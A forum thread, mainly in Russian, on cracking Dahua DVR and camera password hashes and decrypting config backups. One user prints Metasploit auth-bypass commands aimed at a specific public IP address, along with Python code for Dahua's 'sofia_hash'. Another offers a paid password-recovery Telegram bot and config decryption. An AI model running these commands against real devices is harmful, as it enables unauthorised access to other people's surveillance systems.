Dahua config backup encrypted?

[ur7imd]

Да в курсе как и для разных версий там по разному.
Брутил такой для тестового регистратора DHI-HCVR4232AN-S2с прошивкой 2016-07-01, добавлял туда через RPC API своего пользователя чтобы зайти под ним.
Что в новых версиях не интересовался т.к. вы выгрузках хешей нет, а из дампа NAND проблематично отковырять данные.

Я встречал только два:
первый - это sofia_hash (модифицированный MD5), который выдаёт хеши типа: 6QNMIQGe
второй - это описанный мной выше.
Эти хеши можно получить через metasploit.
Например так:
msf > use auxiliary/scanner/misc/dahua_dvr_auth_bypass
msf auxiliary(scanner/misc/dahua_dvr_auth_bypass) > set PASSWORD 888888
msf auxiliary(scanner/misc/dahua_dvr_auth_bypass) > set ACTION USER
msf auxiliary(scanner/misc/dahua_dvr_auth_bypass) > set RHOSTS 134.249.152.231
msf auxiliary(scanner/misc/dahua_dvr_auth_bypass) > run

 

[iTuneDVR]

первый - это sofia_hash (модифицированный MD5), который выдаёт хеши типа: 6QNMIQGe

sofia_hash это не не md5, а свой алгоритм взятый из dahua, но это не меняет дело это все старое.
Задача то какая и в каком конкретном контексте?

 

[ur7imd]

sofia_hash это не не md5, а свой алгоритм взятый из dahua, но это не меняет дело это все старое.
Задача то какая и в каком конкретном контексте?

Выяснить происхождение хеша.

 

[ur7imd]

sofia_hash это не не md5, а свой алгоритм взятый из dahua, но это не меняет дело это все старое.
Задача то какая и в каком конкретном контексте?

... и метода его сбрутить.

 

[ur7imd]

sofia_hash это не не md5, а свой алгоритм взятый из dahua, но это не меняет дело это все старое.
Задача то какая и в каком конкретном контексте?

В основании sofia_hash всё тот же MD5:

import hashlib, sys

def sofia_hash(msg):
h = ""
m = hashlib.md5()
m.update(msg)
msg_md5 = m.digest()
for i in range(8):
n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
if n > 9:
if n > 35:
n += 61
else:
n += 55
else:
n += 0x30
h += chr(n)
return h

if name == "main":
print sofia_hash(sys.argv[1])

 

[iTuneDVR]

В основании sofia_hash всё тот же MD5

md5 лишь часть алгоритма, сам не меняется и далее другие преобразования по этому примеру.
До появления его в джоне как-то обходились своим брутом такого.

... и метода его сбрутить.

У меня есть бот по расшифровке паролей из SmartPSS разных версий. Туда вводят хеши и результаты иногда удивляют.
Используют 32-х символьные пароли иногда и не всегда короткие и с разным набором символов, потому брутить такое не самый лучший вариант, к тому же не зная правильно как.
Я спросил о контексте не случайно.
Сменить пароль, на устройстве регистратора в контексте его версии это одна задача и у нее есть более легкие решения.
Узнать, чтобы далее по цепочке это другое.

 

[ur7imd]

У меня есть бот по расшифровке паролей из SmartPSS разных версий. Туда вводят хеши и результаты иногда удивляют.

Не совсем понял насчёт вот этого. Ты имеешь ввиду ботнет на программе SmartPSS?

 

[iTuneDVR]

Не совсем понял насчёт вот этого. Ты имеешь ввиду ботнет на программе SmartPSS?

Телеграм бот в который можно передать хеш из экспорта устройств SmartPSS и он расшифрует его.

 

[ur7imd]

Телеграм бот в который можно передать хеш из экспорта устройств SmartPSS и он расшифрует его.

а где в SmartPSS экспорт? не могу найти.

 

[ur7imd]

Телеграм бот в который можно передать хеш из экспорта устройств SmartPSS и он расшифрует его.

ага, нашёл. backup называется.
а где можно посмотреть этот самый бот?

 

[ur7imd]

Телеграм бот в который можно передать хеш из экспорта устройств SmartPSS и он расшифрует его.

погоди-ка, ведь это хеш от того пароля, который ты вводишь при добавлении устройства?
тогда какой от него прок?
если я оставляю поле password пустым, то и хеша никакого нет.

 

[iTuneDVR]

Телеграм бот с монетизацией и предназначен для вспоминания своих забытых паролей доступных устройств, которые уж есть в этом ПО.
В этом его суть.
Ищется по iTuneDVR и там разное...

 

[ur7imd]

Телеграм бот с монетизацией и предназначен для вспоминания своих забытых паролей доступных устройств, которые уж есть в этом ПО.
В этом его суть.
Ищется по iTuneDVR и там разное...

понятно. это для склерозников

 

[iTuneDVR]

понятно. это для склерозников

Посыл именно такой, что давно стоит, работает, в вот надо и никак, ведь все сейчас уведено в веб настройки.
Но бывает и по другим темам. Кому очень надо всегда прикинет как проще, искать кнопку, искать сброс и не парится с вспоминанием или ...

Если есть готовый хеш, который надо вспомнить, то заходи и вводи его
Я в любом случае увижу и будет понятно, есть ли шансы для брута

iTuneDVR_SmartPSS_bot

Dahua devices passwords recaller for SmartPSS V1.0, V2.0 32bit, 64bit, SmartPSSLite(Plus). DONATIONS ONLY!

t.me

 

[Adamadmin]

Hi!

I have problem decripting a config. Its an IPC-HFW55442E-ZE camera. I've tried a lot of keys (IPC,ipc, IPC-HFW55442E-ZE, IPC-HFW55442EP-ZE ) but no luck.

 

[iTuneDVR]

Hi!
I have problem decripting a config. Its an IPC-HFW55442E-ZE camera. I've tried a lot of keys (IPC,ipc, IPC-HFW55442E-ZE, IPC-HFW55442EP-ZE ) but no luck.

Your SN: ***********5002

 

[Adamadmin]

Your SN: ***********5002

Thanks for the fast response.
Yes, thats my serial number, but what was the key?

 

[iTuneDVR]

Sorry, only can send decrypted config if you need it.

 

[Adamadmin]

Sorry, only can send decrypted config if you need it.

That would be great!

 

[Adamadmin]

Sorry, only can send decrypted config if you need it.

Please send me the decripted config.